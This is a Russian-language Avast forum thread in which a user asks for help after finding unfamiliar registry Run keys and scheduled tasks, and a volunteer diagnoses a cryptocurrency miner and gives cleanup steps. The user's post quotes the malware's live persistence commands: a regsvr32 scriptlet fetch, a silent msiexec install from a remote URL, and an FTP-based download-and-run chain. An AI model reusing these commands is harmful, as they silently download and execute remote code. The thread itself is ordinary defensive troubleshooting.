Author Topic: нашел странные записи в реестре  (Read 1724 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
нашел странные записи в реестре
« on: August 11, 2017, 01:00:10 AM »
Здравствуйте, у меня такая проблема: обнаружил в реестре в разделе Run две, отсутствующие до этого записи -
Имя - Start.  Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1.  Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
Кроме того в планировщике заданий появились несколько записей -
 Mysa. Действие - Запуск программы. Подробности - /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe.
 Mysa1
 Mysa2
 Mysa3
с перепугу удалил их, а потом у Вас на форуме нашел похожий случай.
Подскажите, пожалуйста, это всё или нужны еще какие-то действия ?
Прикрепил логи, собранные по инструкции.

Offline Andrey,pro

  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5012
  • Things happen
Re: нашел странные записи в реестре
« Reply #1 on: August 11, 2017, 07:00:20 PM »
alndr, здравствуйте и добро пожаловать на форум!

У вас был биткойн-майнер, который использовал вычислительные мощности ПК для добычи криптовалюты. MBAM удалил его.

1. Через Установку и удаление программ в Панели управления удалите программу WindowsMangerProtect.
2.
  • Сохраните прикрепленный файл fixlist.txt в папку, откуда был запущен FRST (E:\Документы\Резерв\Programs\Antivirus)
  • Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!

3. Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.
« Last Edit: August 11, 2017, 07:20:48 PM by Andrey,pro »

REDACTED

  • Guest
Re: нашел странные записи в реестре
« Reply #2 on: August 11, 2017, 08:20:04 PM »
сделал по шагам, результат
прикрепил во вложении

узел root\subscription не конечный элемент дерева - это нормально ?
в нем вот такие элементы
ROOT\subscription\ms_409
ROOT\subscription\ms_419

я скопировал скрипт именно с корневого элемента.

Offline Andrey,pro

  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5012
  • Things happen
Re: нашел странные записи в реестре
« Reply #3 on: August 11, 2017, 09:48:29 PM »
alndr, проблема по-прежнему наблюдается?